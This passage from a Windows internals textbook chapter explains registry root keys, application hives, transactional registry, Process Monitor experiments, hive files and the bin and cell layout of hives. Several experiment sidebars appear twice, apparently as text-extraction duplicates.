lation. The CBS APIs that exist for servicing purposes use the information located in this key to identify
installed components and their configuration information. This information is used whenever compo-
nents are installed, updated, or removed either individually (called units) or in groups (called packages).
To optimize system resources, because this key can get quite large, it is only dynamically loaded and
unloaded as needed if the CBS stack is servicing a request. This key is backed by the COMPONENTS
hive file located in \Windows\system32\config.
The HKLM\HARDWARE subkey maintains descriptions of the system’s legacy hardware and some
hardware device-to-driver mappings. On a modern system, only a few peripherals—such as keyboard,
mouse, and ACPI BIOS data—are likely to be found here. The Device Manager tool lets you view regis-
try hardware information that it obtains by simply reading values out of the HARDWARE key (although
it primarily uses the HKLM\SYSTEM\CurrentControlSet\Enum tree).
HKLM\SAM holds local account and group information, such as user passwords, group definitions,
and domain associations. Windows Server systems operating as domain controllers store domain ac-
counts and groups in Active Directory, a database that stores domainwide settings and information.
(Active Directory isn’t described in this book.) By default, the security descriptor on the SAM key is
configured so that even the administrator account doesn’t have access.
HKLM\SECURITY stores systemwide security policies and user-rights assignments. HKLM\SAM is
linked into the SECURITY subkey under HKLM\SECURITY\SAM. By default, you can’t view the contents
of HKLM\SECURITY or HKLM\SAM because the security settings of those keys allow access only by the
System account. (System accounts are discussed in greater detail later in this chapter.) You can change
the security descriptor to allow read access to administrators, or you can use PsExec to run Regedit in the
local system account if you want to peer inside. However, that glimpse won’t be very revealing because
the data is undocumented and the passwords are encrypted with one-way mapping—that is, you can’t
determine a password from its encrypted form. The SAM and SECURITY subkeys are backed by the SAM
and SECURITY hive files located in the \Windows\system32\config path of the boot partition.
HKLM\SOFTWARE is where Windows stores systemwide configuration information not needed to
boot the system. Also, third-party applications store their systemwide settings here, such as paths to
application files and directories and licensing and expiration date information.
HKLM\SYSTEM contains the systemwide configuration information needed to boot the system,
such as which device drivers to load and which services to start. The key is backed by the SYSTEM hive
file located in \Windows\system32\config. The Windows Loader uses registry services provided by the
Boot Library for being able to read and navigate through the SYSTEM hive.
HKEY_CURRENT_CONFIG
HKEY_CURRENT_CONFIG is just a link to the current hardware profile, stored under HKLM\SYSTEM\
CurrentControlSet\Hardware Profiles\Current. Hardware profiles are no longer supported in Windows,
but the key still exists to support legacy applications that might depend on its presence.
CHAPTER 10 Management, diagnostics, and tracing
401
HKEY_PERFORMANCE_DATA and HKEY_PERFORMANCE_TEXT
The registry is the mechanism used to access performance counter values on Windows, whether those
are from operating system components or server applications. One of the side benefits of providing
access to the performance counters via the registry is that remote performance monitoring works “for
free” because the registry is easily accessible remotely through the normal registry APIs.
You can access the registry performance counter information directly by opening a special key
named HKEY_PERFORMANCE_DATA and querying values beneath it. You won’t find this key by look-
ing in the Registry Editor; this key is available only programmatically through the Windows registry
functions, such as RegQueryValueEx. Performance information isn’t actually stored in the registry; the
registry functions redirect access under this key to live performance information obtained from perfor-
mance data providers.
The HKEY_PERFORMANCE_TEXT is another special key used to obtain performance counter
information (usually name and description). You can obtain the name of any performance counter by
querying data from the special Counter registry value. The Help special registry value yields all the
counters description instead. The information returned by the special key are in US English. The HKEY_
PERFORMANCE_NLSTEXT retrieves performance counters names and descriptions in the language in
which the OS runs.
You can also access performance counter information by using the Performance Data Helper (PDH)
functions available through the Performance Data Helper API (Pdh.dll). Figure 10-2 shows the compo-
nents involved in accessing performance counter information.
Custom
application A
Performance
tool
Custom
application B
RegQueryValueEx
Performance
monitoring
applications
Programming
interfaces
Advapi32.dll
PerfLib
Registry DLL provider
High-performance provider interface
Windows Management Instrumentation
System
performance
DLL
System
performance
DLL
System
performance
DLL
Performance
extension
DLL
Performance
extension
DLL
Performance
extension
DLL
High-
performance
data provider
object
High-
performance
data provider
object
High-
performance
data provider
object
Pdh.dll
FIGURE 10-2 Registry performance counter architecture.
As shown in Figure 10-2, this registry key is abstracted by the Performance Library (Perflib),
which is statically linked in Advapi32.dll. The Windows kernel has no knowledge about the
HKEY_PERFORMANCE_DATA registry key, which explains why it is not shown in the Registry Editor.
402
CHAPTER 10 Management, diagnostics, and tracing
Application hives
Applications are normally able to read and write data from the global registry. When an application
opens a registry key, the Windows kernel performs an access check verification against the access token
of its process (or thread in case the thread is impersonating; see Chapter 7 in Part 1 for more details)
and the ACL that a particular key contains. An application is also able to load and save registry hives by
using the RegSaveKeyEx and RegLoadKeyEx APIs. In those scenarios, the application operates on data
that other processes running at a higher or same privilege level can interfere with. Furthermore, for
loading and saving hives, the application needs to enable the Backup and Restore privileges. The two
privileges are granted only to processes that run with an administrative account.
Clearly this was a limitation for most applications that want to access a private repository for storing
their own settings. Windows 7 has introduced the concept of application hives. An application hive is a
standard hive file (which is linked to the proper log files) that can be mounted visible only to the appli-
cation that requested it. A developer can create a base hive file by using the RegSaveKeyEx API (which
exports the content of a regular registry key in an hive file). The application can then mount the hive
privately using the RegLoadAppKey function (specifying the REG_PROCESS_APPKEY flag prevents other
applications from accessing the same hive). Internally, the function performs the following operations:
1.
Creates a random GUID and assigns it to a private namespace, in the form of \Registry\
A\<Random Guid>. (\Registry forms the NT kernel registry namespace, described in the
“The registry namespace and operation” section later in this chapter.)
2.
Converts the DOS path of the specified hive file name in NT format and calls the NtLoadKeyEx
native API with the proper set of parameters.
The NtLoadKeyEx function calls the regular registry callbacks. However, when it detects that the
hive is an application hive, it uses CmLoadAppKey to load it (and its associated log files) in the private
namespace, which is not enumerable by any other application and is tied to the lifetime of the calling
process. (The hive and log files are still mapped in the “registry process,” though. The registry process
will be described in the “Startup and registry process” section later in this chapter.) The application can
use standard registry APIs to read and write its own private settings, which will be stored in the applica-
tion hive. The hive will be automatically unloaded when the application exits or when the last handle to
the key is closed.
Application hives are used by different Windows components, like the Application Compatibility
telemetry agent (CompatTelRunner.exe) and the Modern Application Model. Universal Windows
Platform (UWP) applications use application hives for storing information of WinRT classes that can be
instantiated and are private for the application. The hive is stored in a file called ActivationStore.dat
and is consumed primarily by the Activation Manager when an application is launched (or more pre-
cisely, is “activated”). The Background Infrastructure component of the Modern Application Model uses
the data stored in the hive for storing background tasks information. In that way, when a background
task timer elapses, it knows exactly in which application library the task’s code resides (and the activa-
tion type and threading model).
Furthermore, the modern application stack provides to UWP developers the concept of Application
Data containers, which can be used for storing settings that can be local to the device in which the
CHAPTER 10 Management, diagnostics, and tracing
403
application runs (in this case, the data container is called local) or can be automatically shared between
all the user’s devices that the application is installed on. Both kinds of containers are implemented in
the Windows.Storage.ApplicationData.dll WinRT library, which uses an application hive, local to the ap-
plication (the backing file is called settings.dat), to store the settings created by the UWP application.
Both the settings.dat and the ActivationStore.dat hive files are created by the Modern Application
Model’s Deployment process (at app-installation time), which is covered extensively in Chapter 8,
“System mechanisms,” (with a general discussion of packaged applications). The Application
Data containers are documented at https://docs.microsoft.com/en-us/windows/uwp/get-started/
settings-learning-track.
Transactional Registry (TxR)
Thanks to the Kernel Transaction Manager (KTM; for more information see the section about the KTM
in Chapter 8), developers have access to a straightforward API that allows them to implement robust
error-recovery capabilities when performing registry operations, which can be linked with nonregistry
operations, such as file or database operations.
Three APIs support transactional modification of the registry: RegCreateKeyTransacted,
RegOpenKeyTransacted, and RegDeleteKeyTransacted. These new routines take the same parameters
as their nontransacted analogs except that a new transaction handle parameter is added. A developer
supplies this handle after calling the KTM function CreateTransaction.
After a transacted create or open operation, all subsequent registry operations—such as creat-
ing, deleting, or modifying values inside the key—will also be transacted. However, operations on
the subkeys of a transacted key will not be automatically transacted, which is why the third API,
RegDeleteKeyTransacted exists. It allows the transacted deletion of subkeys, which RegDeleteKeyEx
would not normally do.
Data for these transacted operations is written to log files using the common logging file system
(CLFS) services, similar to other KTM operations. Until the transaction is committed or rolled back
(both of which might happen programmatically or as a result of a power failure or system crash, de-
pending on the state of the transaction), the keys, values, and other registry modifications performed
with the transaction handle will not be visible to external applications through the nontransacted APIs.
Also, transactions are isolated from each other; modifications made inside one transaction will not be
visible from inside other transactions or outside the transaction until the transaction is committed.
Note A nontransactional writer will abort a transaction in case of conflict—for example, if
a value was created inside a transaction and later, while the transaction is still active, a non-
transactional writer tries to create a value under the same key. The nontransactional opera-
tion will succeed, and all operations in the conflicting transaction will be aborted.
The isolation level (the “I” in ACID) implemented by TxR resource managers is read-commit, which
means that changes become available to other readers (transacted or not) immediately after being
committed. This mechanism is important for people who are familiar with transactions in databases,
404
CHAPTER 10 Management, diagnostics, and tracing
where the isolation level is predictable-reads (or cursor-stability, as it is called in database literature).
With a predictable-reads isolation level, after you read a value inside a transaction, subsequent reads
returns the same data. Read-commit does not make this guarantee. One of the consequences is that
registry transactions can’t be used for “atomic” increment/decrement operations on a registry value.
To make permanent changes to the registry, the application that has been using the transaction
handle must call the KTM function CommitTransaction. (If the application decides to undo the changes,
such as during a failure path, it can call the RollbackTransaction API.) The changes are then visible
through the regular registry APIs as well.
Note If a transaction handle created with CreateTransaction is closed before the transaction
is committed (and there are no other handles open to that transaction), the system rolls back
that transaction.
Apart from using the CLFS support provided by the KTM, TxR also stores its own internal log files in
the %SystemRoot%\System32\Config\Txr folder on the system volume; these files have a .regtrans-ms
extension and are hidden by default. There is a global registry resource manager (RM) that services all
the hives mounted at boot time. For every hive that is mounted explicitly, an RM is created. For applica-
tions that use registry transactions, the creation of an RM is transparent because KTM ensures that all
RMs taking part in the same transaction are coordinated in the two-phase commit/abort protocol. For
the global registry RM, the CLFS log files are stored, as mentioned earlier, inside System32\Config\Txr.
For other hives, they are stored alongside the hive (in the same directory). They are hidden and follow
the same naming convention, ending in .regtrans-ms. The log file names are prefixed with the name of
the hive to which they correspond.
Monitoring registry activity
Because the system and applications depend so heavily on configuration settings to guide their behav-
ior, system and application failures can result from changing registry data or security. When the system
or an application fails to read settings that it assumes it will always be able to access, it might not func-
tion properly, display error messages that hide the root cause, or even crash. It’s virtually impossible
to know what registry keys or values are misconfigured without understanding how the system or the
application that’s failing is accessing the registry. In such situations, the Process Monitor utility from
Windows Sysinternals (https://docs.microsoft.com/en-us/sysinternals/) might provide the answer.
Process Monitor lets you monitor registry activity as it occurs. For each registry access, Process
Monitor shows you the process that performed the access; the time, type, and result of the access; and
the stack of the thread at the moment of the access. This information is useful for seeing how applica-
tions and the system rely on the registry, discovering where applications and the system store con-
figuration settings, and troubleshooting problems related to applications having missing registry keys
or values. Process Monitor includes advanced filtering and highlighting so that you can zoom in on
activity related to specific keys or values or to the activity of particular processes.
CHAPTER 10 Management, diagnostics, and tracing
405
Process Monitor internals
Process Monitor relies on a device driver that it extracts from its executable image at runtime before
starting it. Its first execution requires that the account running it has the Load Driver privilege as well as
the Debug privilege; subsequent executions in the same boot session require only the Debug privilege
because, once loaded, the driver remains resident.
EXPERIMENT: Viewing registry activity on an idle system
Because the registry implements the RegNotifyChangeKey function that applications can use
to request notification of registry changes without polling for them, when you launch Process
Monitor on a system that’s idle you should not see repetitive accesses to the same registry keys
or values. Any such activity identifies a poorly written application that unnecessarily negatively
affects a system’s overall performance.
Run Process Monitor, make sure that only the Show Registry Activity icon is enabled in the
toolbar (with the goal to remove noise generated by the File system, network, and processes or
threads) and, after several seconds, examine the output log to see whether you can spot polling
behavior. Right-click an output line associated with polling and then choose Process Properties
from the context menu to view details about the process performing the activity.
EXPERIMENT: Using Process Monitor to locate application registry settings
In some troubleshooting scenarios, you might need to determine where in the registry the sys-
tem or an application stores particular settings. This experiment has you use Process Monitor to
discover the location of Notepad’s settings. Notepad, like most Windows applications, saves user
preferences—such as word-wrap mode, font and font size, and window position—across execu-
tions. By having Process Monitor watching when Notepad reads or writes its settings, you can
identify the registry key in which the settings are stored. Here are the steps for doing this:
1.
Have Notepad save a setting you can easily search for in a Process Monitor trace.
You can do this by running Notepad, setting the font to Times New Roman, and then
exiting Notepad.
2.
Run Process Monitor. Open the filter dialog box and the Process Name filter, and type
notepad.exe as the string to match. Confirm by clicking the Add button. This step
specifies that Process Monitor will log only activity by the notepad.exe process.
3.
Run Notepad again, and after it has launched, stop Process Monitor’s event capture by
toggling Capture Events on the Process Monitor File menu.
4.
Scroll to the top line of the resultant log and select it.
EXPERIMENT: Viewing registry activity on an idle system
Because the registry implements the RegNotifyChangeKey function that applications can use
RegNotifyChangeKey function that applications can use
RegNotifyChangeKey
to request notification of registry changes without polling for them, when you launch Process
Monitor on a system that’s idle you should not see repetitive accesses to the same registry keys
or values. Any such activity identifies a poorly written application that unnecessarily negatively
affects a system’s overall performance.
Run Process Monitor, make sure that only the Show Registry Activity icon is enabled in the
Show Registry Activity icon is enabled in the
Show Registry Activity
toolbar (with the goal to remove noise generated by the File system, network, and processes or
threads) and, after several seconds, examine the output log to see whether you can spot polling
behavior. Right-click an output line associated with polling and then choose Process Properties
from the context menu to view details about the process performing the activity.
EXPERIMENT: Using Process Monitor to locate application registry settings
In some troubleshooting scenarios, you might need to determine where in the registry the sys-
tem or an application stores particular settings. This experiment has you use Process Monitor to
discover the location of Notepad’s settings. Notepad, like most Windows applications, saves user
preferences—such as word-wrap mode, font and font size, and window position—across execu-
tions. By having Process Monitor watching when Notepad reads or writes its settings, you can
identify the registry key in which the settings are stored. Here are the steps for doing this:
1.
Have Notepad save a setting you can easily search for in a Process Monitor trace.
You can do this by running Notepad, setting the font to Times New Roman, and then
exiting Notepad.
2.
Run Process Monitor. Open the filter dialog box and the Process Name filter, and type
notepad.exe as the string to match. Confirm by clicking the Add button. This step
specifies that Process Monitor will log only activity by the notepad.exe process.
3.
Run Notepad again, and after it has launched, stop Process Monitor’s event capture by
toggling Capture Events on the Process Monitor File menu.
4.
Scroll to the top line of the resultant log and select it.
406
CHAPTER 10 Management, diagnostics, and tracing
5.
Press Ctrl+F to open a Find dialog box, and search for times new. Process Monitor
should highlight a line like the one shown in the following screen that represents
Notepad reading the font value from the registry. Other operations in the immediate
vicinity should relate to other Notepad settings.
6.
Right-click the highlighted line and click Jump To. Process Monitor starts Regedit (if it’s
not already running) and causes it to navigate to and select the Notepad-referenced
registry value.
Registry internals
This section describes how the configuration manager—the executive subsystem that implements the
registry—organizes the registry’s on-disk files. We’ll examine how the configuration manager manages
the registry as applications and other operating system components read and change registry keys and
values. We’ll also discuss the mechanisms by which the configuration manager tries to ensure that the
registry is always in a recoverable state, even if the system crashes while the registry is being modified.
Hives
On disk, the registry isn’t simply one large file but rather a set of discrete files called hives. Each hive
contains a registry tree, which has a key that serves as the root or starting point of the tree. Subkeys
and their values reside beneath the root. You might think that the root keys displayed by the Registry
Editor correlate to the root keys in the hives, but such is not the case. Table 10-5 lists registry hives and
their on-disk file names. The path names of all hives except for user profiles are coded into the con-
figuration manager. As the configuration manager loads hives, including system profiles, it notes each
hive’s path in the values under the HKLM\SYSTEM\CurrentControlSet\Control\Hivelist subkey, remov-
ing the path if the hive is unloaded. It creates the root keys, linking these hives together to build the
registry structure you’re familiar with and that the Registry Editor displays.
5.
Press Ctrl+F to open a Find dialog box, and search for times new. Process Monitor
should highlight a line like the one shown in the following screen that represents
Notepad reading the font value from the registry. Other operations in the immediate
vicinity should relate to other Notepad settings.
6.
Right-click the highlighted line and click Jump To. Process Monitor starts Regedit (if it’s
not already running) and causes it to navigate to and select the Notepad-referenced
registry value.
CHAPTER 10 Management, diagnostics, and tracing
407
TABLE 10-5 On-disk files corresponding to paths in the registry
Hive Registry Path
Hive File Path
HKEY_LOCAL_MACHINE\BCD00000000
\EFI\Microsoft\Boot
HKEY_LOCAL_MACHINE\COMPONENTS
%SystemRoot%\System32\Config\Components
HKEY_LOCAL_MACHINE\SYSTEM
%SystemRoot%\System32\Config\System
HKEY_LOCAL_MACHINE\SAM
%SystemRoot%\System32\Config\Sam
HKEY_LOCAL_MACHINE\SECURITY
%SystemRoot%\System32\Config\Security
HKEY_LOCAL_MACHINE\SOFTWARE
%SystemRoot%\System32\Config\Software
HKEY_LOCAL_MACHINE\HARDWARE
Volatile hive
\HKEY_LOCAL_MACHINE\WindowsAppLockerCache
%SystemRoot%\System32\AppLocker\AppCache.dat
HKEY_LOCAL_MACHINE\ELAM
%SystemRoot%\System32\Config\Elam
HKEY_USERS\<SID of local service account>
%SystemRoot%\ServiceProfiles\LocalService\Ntuser.dat
HKEY_USERS\<SID of network service account>
%SystemRoot%\ServiceProfiles\NetworkService\NtUser.dat
HKEY_USERS\<SID of username>
\Users\<username>\Ntuser.dat
HKEY_USERS\<SID of username>_Classes
\Users\<username>\AppData\Local\Microsoft\Windows\
Usrclass.dat
HKEY_USERS\.DEFAULT
%SystemRoot%\System32\Config\Default
Virtualized HKEY_LOCAL_MACHINE\SOFTWARE
Different paths. Usually
\ProgramData\Packages\<PackageFullName>\<UserSid>\
SystemAppData\Helium\Cache\<RandomName>.dat for
Centennial
Virtualized HKEY_CURRENT_USER
Different paths. Usually
\ProgramData\Packages\<PackageFullName>\<UserSid>\
SystemAppData\Helium\User.dat for Centennial
Virtualized HKEY_LOCAL_MACHINE\SOFTWARE\Classes
Different paths. Usually
\ProgramData\Packages\<PackageFullName>\<UserSid>\
SystemAppData\Helium\UserClasses.dat for Centennial
You’ll notice that some of the hives listed in Table 10-5 are volatile and don’t have associated files.
The system creates and manages these hives entirely in memory; the hives are therefore tempo-
rary. The system creates volatile hives every time it boots. An example of a volatile hive is the HKLM\
HARDWARE hive, which stores information about physical devices and the devices’ assigned resources.
Resource assignment and hardware detection occur every time the system boots, so not storing this
data on disk is logical. You will also notice that the last three entries in the table represent virtualized
hives. Starting from Windows 10 Anniversary Update, the NT kernel supports the Virtualized Registry
(VReg), with the goal to provide support for Centennial packaged applications, which runs in a Helium
container. Every time the user runs a centennial application (like the modern Skype, for example), the
system mounts the needed package hives. Centennial applications and the Modern Application Model
have been extensively discussed in Chapter 8.
408
CHAPTER 10 Management, diagnostics, and tracing
EXPERIMENT: Manually loading and unloading hives
Regedit has the ability to load hives that you can access through its File menu. This capability can
be useful in troubleshooting scenarios where you want to view or edit a hive from an unbootable
system or a backup medium. In this experiment, you’ll use Regedit to load a version of the
HKLM\SYSTEM hive that Windows Setup creates during the install process.
1.
Hives can be loaded only underneath HKLM or HKU, so open Regedit, select HKLM,
and choose Load Hive from the Regedit File menu.
2.
Navigate to the %SystemRoot%\System32\Config\RegBack directory in the Load Hive
dialog box, select System, and open it. Some newer systems may not have any file in
the RegBack folder. In that case, you can try the same experiment by opening the ELAM
hive located in the Config folder. When prompted, type Test as the name of the key
under which it will load.
3.
Open the newly created HKLM\Test key and explore the contents of the hive.
4.
Open HKLM\SYSTEM\CurrentControlSet\Control\Hivelist and locate the entry
\Registry\Machine\Test, which demonstrates how the configuration manager lists
loaded hives in the Hivelist key.
5.
Select HKLM\Test and then choose Unload Hive from the Regedit File menu to unload
the hive.
Hive size limits
In some cases, hive sizes are limited. For example, Windows places a limit on the size of the
HKLM\SYSTEM hive. It does so because Winload reads the entire HKLM\SYSTEM hive into physical
memory near the start of the boot process when virtual memory paging is not enabled. Winload also
loads Ntoskrnl and boot device drivers into physical memory, so it must constrain the amount of physi-
cal memory assigned to HKLM\SYSTEM. (See Chapter 12 for more information on the role Winload
plays during the startup process.) On 32-bit systems, Winload allows the hive to be as large as 400 MB
or half the amount of physical memory on the system, whichever is lower. On x64 systems, the lower
bound is 2 GB.
Startup and the registry process
Before Windows 8.1, the NT kernel was using paged pool for storing the content of every loaded hive
file. Most of the hives loaded in the system remained in memory until the system shutdown (a good
example is the SOFTWARE hive, which is loaded by the Session Manager after phase 1 of the System
startup is completed and sometimes could be multiple hundreds of megabytes in size). Paged pool
memory could be paged out by the balance set manager of the memory manager, if it is not accessed
for a certain amount of time (see Chapter 5, “Memory management,” in Part 1 for more details). This
implies that unused parts of a hive do not remain in the working set for a long time. Committed virtual
EXPERIMENT: Manually loading and unloading hives
Regedit has the ability to load hives that you can access through its File menu. This capability can
be useful in troubleshooting scenarios where you want to view or edit a hive from an unbootable
system or a backup medium. In this experiment, you’ll use Regedit to load a version of the
HKLM\SYSTEM hive that Windows Setup creates during the install process.
1.
Hives can be loaded only underneath HKLM or HKU, so open Regedit, select HKLM,
and choose Load Hive from the Regedit File menu.
2.
Navigate to the %SystemRoot%\System32\Config\RegBack directory in the Load Hive
dialog box, select System, and open it. Some newer systems may not have any file in
the RegBack folder. In that case, you can try the same experiment by opening the ELAM
hive located in the Config folder. When prompted, type Test as the name of the key
under which it will load.
3.
Open the newly created HKLM\Test key and explore the contents of the hive.
4.
Open HKLM\SYSTEM\CurrentControlSet\Control\Hivelist and locate the entry
\Registry\Machine\Test, which demonstrates how the configuration manager lists
loaded hives in the Hivelist key.
Hivelist key.
Hivelist
5.
Select HKLM\Test and then choose Unload Hive from the Regedit File menu to unload
the hive.
CHAPTER 10 Management, diagnostics, and tracing
409
memory is backed by the page file and requires the system Commit charge to be increased, reducing
the total amount of virtual memory available for other purposes.
To overcome this problem, Windows 10 April 2018 Update (RS4) introduced support for the section-
backed registry. At phase 1 of the NT kernel initialization, the Configuration manager startup routine
initializes multiple components of the Registry: cache, worker threads, transactions, callbacks support,
and so on. It then creates the Key object type, and, before loading the needed hives, it creates the
Registry process. The Registry process is a fully-protected (same protection as the SYSTEM process:
WinSystem level), minimal process, which the configuration manager uses for performing most of the
I/Os on opened registry hives. At initialization time, the configuration manager maps the preloaded
hives in the Registry process. The preloaded hives (SYSTEM and ELAM) continue to reside in nonpaged
memory, though (which is mapped using kernel addresses). Later in the boot process, the Session
Manager loads the Software hive by invoking the NtInitializeRegistry system call.
A section object backed by the “SOFTWARE” hive file is created: the configuration manager divides
the file in 2-MB chunks and creates a reserved mapping in the Registry process’s user-mode address
space for each of them (using the NtMapViewOfSection native API. Reserved mappings are tracked by
valid VADs, but no actual pages are allocated. See Chapter 5 in Part 1 for further details). Each 2-MB
view is read-only protected. When the configuration manager wants to read some data from the hive,
it accesses the view’s pages and produces an access fault, which causes the shared pages to be brought
into memory by the memory manager. At that time, the system working set charge is increased, but
not the commit charge (the pages are backed by the hive file itself, and not by the page file).
At initialization time, the configuration manager sets the hard-working set limit to the Registry pro-
cess at 64 MB. This means that in high memory pressure scenarios, it is guaranteed that no more than
64 MB of working set is consumed by the registry. Every time an application or the system uses the
APIs to access the registry, the configuration manager attaches to the Registry process address space,
performs the needed work, and returns the results. The configuration manager doesn’t always need to
switch address spaces: when the application wants to access a registry key that is already in the cache
(a Key control block already exists), the configuration manager skips the process attach and returns the
cached data. The registry process is primarily used for doing I/O on the low-level hive file.
When the system writes or modifies registry keys and values stored in a hive, it performs a copy-
on-write operation (by first changing the memory protection of the 2 MB view to PAGE_WRITECOPY).
Writing to memory marked as copy-on-write creates new private pages and increases the system
commit charge. When a registry update is requested, the system immediately writes new entries in
the hive’s log, but the writing of the actual pages belonging to the primary hive file is deferred. Dirty
hive’s pages, as for every normal memory page, can be paged out to disk. Those pages are written to
the primary hive file when the hive is being unloaded or by the Reconciler: one of the configuration
manager’s lazy writer threads that runs by default once every hour (the time period is configurable
by setting the HKLM\SYSTEM\ CurrentControlSet\Control\Session Manager\Configuration Manager\
RegistryLazyReconcileInterval registry value).
The Reconciler and the Incremental logging are discussed in the “Incremental logging” section later
in this chapter.
410
CHAPTER 10 Management, diagnostics, and tracing
Registry symbolic links
A special type of key known as a registry symbolic link makes it possible for the configuration manager
to link keys to organize the registry. A symbolic link is a key that redirects the configuration manager to
another key. Thus, the key HKLM\SAM is a symbolic link to the key at the root of the SAM hive. Symbolic
links are created by specifying the REG_CREATE_LINK parameter to RegCreateKey or RegCreateKeyEx.
Internally, the configuration manager will create a REG_LINK value called SymbolicLinkValue, which con-
tains the path to the target key. Because this value is a REG_LINK instead of a REG_SZ, it will not be visible
with Regedit—it is, however, part of the on-disk registry hive.
EXPERIMENT: Looking at hive handles
The configuration manager opens hives by using the kernel handle table (described in Chapter 8)
so that it can access hives from any process context. Using the kernel handle table is an efficient
alternative to approaches that involve using drivers or executive components to access from the
System process only handles that must be protected from user processes. You can start Process
Explorer as Administrator to see the hive handles, which will be displayed as being opened in
the System process. Select the System process, and then select Handles from the Lower Pane
View menu entry on the View menu. Sort by handle type, and scroll until you see the hive files,
as shown in the following screen.
EXPERIMENT: Looking at hive handles
The configuration manager opens hives by using the kernel handle table (described in Chapter 8)
so that it can access hives from any process context. Using the kernel handle table is an efficient
alternative to approaches that involve using drivers or executive components to access from the
System process only handles that must be protected from user processes. You can start Process
Explorer as Administrator to see the hive handles, which will be displayed as being opened in
the System process. Select the System process, and then select Handles from the Lower Pane
View menu entry on the View menu. Sort by handle type, and scroll until you see the hive files,
as shown in the following screen.
CHAPTER 10 Management, diagnostics, and tracing
411
Hive structure
The configuration manager logically divides a hive into allocation units called blocks in much the same
way that a file system divides a disk into clusters. By definition, the registry block size is 4096 bytes
(4 KB). When new data expands a hive, the hive always expands in block-granular increments. The first
block of a hive is the base block.
The base block includes global information about the hive, including a signature—regf—that iden-
tifies the file as a hive, two updated sequence numbers, a time stamp that shows the last time a write
operation was initiated on the hive, information on registry repair or recovery performed by Winload,
the hive format version number, a checksum, and the hive file’s internal file name (for example,
\Device\HarddiskVolume1\WINDOWS\SYSTEM32\CONFIG\SAM). We’ll clarify the significance of the
two updated sequence numbers and time stamp when we describe how data is written to a hive file.
The hive format version number specifies the data format within the hive. The configuration man-
ager uses hive format version 1.5, which supports large values (values larger than 1 MB are supported)
and improved searching (instead of caching the first four characters of a name, a hash of the entire
name is used to reduce collisions). Furthermore, the configuration manager supports differencing hives
introduced for container support. Differencing hives uses hive format 1.6.
Windows organizes the registry data that a hive stores in containers called cells. A cell can hold a
key, a value, a security descriptor, a list of subkeys, or a list of key values. A four-byte character tag at
the beginning of a cell’s data describes the data’s type as a signature. Table 10-6 describes each cell
data type in detail. A cell’s header is a field that specifies the cell’s size as the 1’s complement (not pres-
ent in the CM_ structures). When a cell joins a hive and the hive must expand to contain the cell, the
system creates an allocation unit called a bin.
A bin is the size of the new cell rounded up to the next block or page boundary, whichever is higher.
The system considers any space between the end of the cell and the end of the bin to be free space
that it can allocate to other cells. Bins also have headers that contain a signature, hbin, and a field that
records the offset into the hive file of the bin and the bin’s size.
TABLE 10-6 Cell data types
Data Type
Structure Type
Description
Key cell
CM_KEY_NODE
A cell that contains a registry key, also called a key node. A key cell con-
tains a signature (kn for a key, kl for a link node), the time stamp of the
most recent update to the key, the cell index of the key’s parent key cell,
the cell index of the subkey-list cell that identifies the key’s subkeys, a cell
index for the key’s security descriptor cell, a cell index for a string key that
specifies the class name of the key, and the name of the key (for example,
CurrentControlSet). It also saves cached information such as the number
of subkeys under the key, as well as the size of the largest key, value name,
value data, and class name of the subkeys under this key.
Value cell
CM_KEY_VALUE
A cell that contains information about a key’s value. This cell includes
a signature (kv), the value’s type (for example, REG_ DWORD or
REG_BINARY), and the value’s name (for example, Boot-Execute).
A value cell also contains the cell index of the cell that contains the
value’s data.
412
CHAPTER 10 Management, diagnostics, and tracing
Data Type
Structure Type
Description
Big Value cell
CM_BIG_DATA
A cell that represents a registry value bigger than 16 kB. For this kind of
cell type, the cell content is an array of cell indexes each pointing to a
16-kB cell, which contains a chunk of the registry value.
Subkey-list cell
CM_KEY_INDEX
A cell composed of a list of cell indexes for key cells that are all subkeys
of a common parent key.
Value-list cell
CM_KEY_INDEX
A cell composed of a list of cell indexes for value cells that are all values
of a common parent key.
Security-descriptor cell
CM_KEY_SECURITY
A cell that contains a security descriptor. Security-descriptor cells in-
clude a signature (ks) at the head of the cell and a reference count that
records the number of key nodes that share the security descriptor.
Multiple key cells can share security-descriptor cells.
By using bins instead of cells, to track active parts of the registry, Windows minimizes some man-
agement chores. For example, the system usually allocates and deallocates bins less frequently than it
does cells, which lets the configuration manager manage memory more efficiently. When the configu-
ration manager reads a registry hive into memory, it reads the whole hive, including empty bins, but it
can choose to discard them later. When the system adds and deletes cells in a hive, the hive can contain
empty bins interspersed with active bins. This situation is similar to disk fragmentation, which occurs
when the system creates and deletes files on the disk. When a bin becomes empty, the configuration
manager joins to the empty bin any adjacent empty bins to form as large a contiguous empty bin as
possible. The configuration manager also joins adjacent deleted cells to form larger free cells. (The con-
figuration manager shrinks a hive only when bins at the end of the hive become free. You can compact
the registry by backing it up and restoring it using the Windows RegSaveKey and RegReplaceKey func-
tions, which are used by the Windows Backup utility. Furthermore, the system compacts the bins at hive
initialization time using the Reorganization algorithm, as described later.)
The links that create the structure of a hive are called cell indexes. A cell index is the offset of a cell
into the hive file minus the size of the base block. Thus, a cell index is like a pointer from one cell to an-
other cell that the configuration manager interprets relative to the start of a hive. For example, as you
saw in Table 10-6, a cell that describes a key contains a field specifying the cell index of its parent key; a
cell index for a subkey specifies the cell that describes the subkeys that are subordinate to the specified
subkey. A subkey-list cell contains a list of cell indexes that refer to the subkey’s key cells. Therefore, if
you want to locate, for example, the key cell of subkey A whose parent is key B, you must first locate the
cell containing key B’s subkey list using the subkey-list cell index in key B’s cell. Then you locate each of
key B’s subkey cells by using the list of cell indexes in the subkey-list cell. For each subkey cell, you check
to see whether the subkey’s name, which a key cell stores, matches the one you want to locate—in this
case, subkey A.
The distinction between cells, bins, and blocks can be confusing, so let’s look at an example of a
simple registry hive layout to help clarify the differences. The sample registry hive file in Figure 10-3
contains a base block and two bins. The first bin is empty, and the second bin contains several cells.
Logically, the hive has only two keys: the root key Root and a subkey of Root, Sub Key. Root has two val-
ues, Val 1 and Val 2. A subkey-list cell locates the root key’s subkey, and a value-list cell locates the root
key’s values. The free spaces in the second bin are empty cells. Figure 10-3 doesn’t show the security
cells for the two keys, which would be present in a hive.
CHAPTER 10 Management, diagnostics, and tracing
413
Key cell (key node)
Value cell
Value-list cell
Base block
Empty bin
Root
Vol 1
Sub Vol 2
Key
Subkey-list cell
Free space
Bin 2
Block boundaries
Bin 1
FIGURE 10-3 Internal structure of a registry hive.
To optimize searches for both values and subkeys, the configuration manager sorts subkey-list cells
alphabetically. The configuration manager can then perform a binary search when it looks for a subkey
within a list of subkeys. The configuration manager examines the subkey in the middle of the list, and
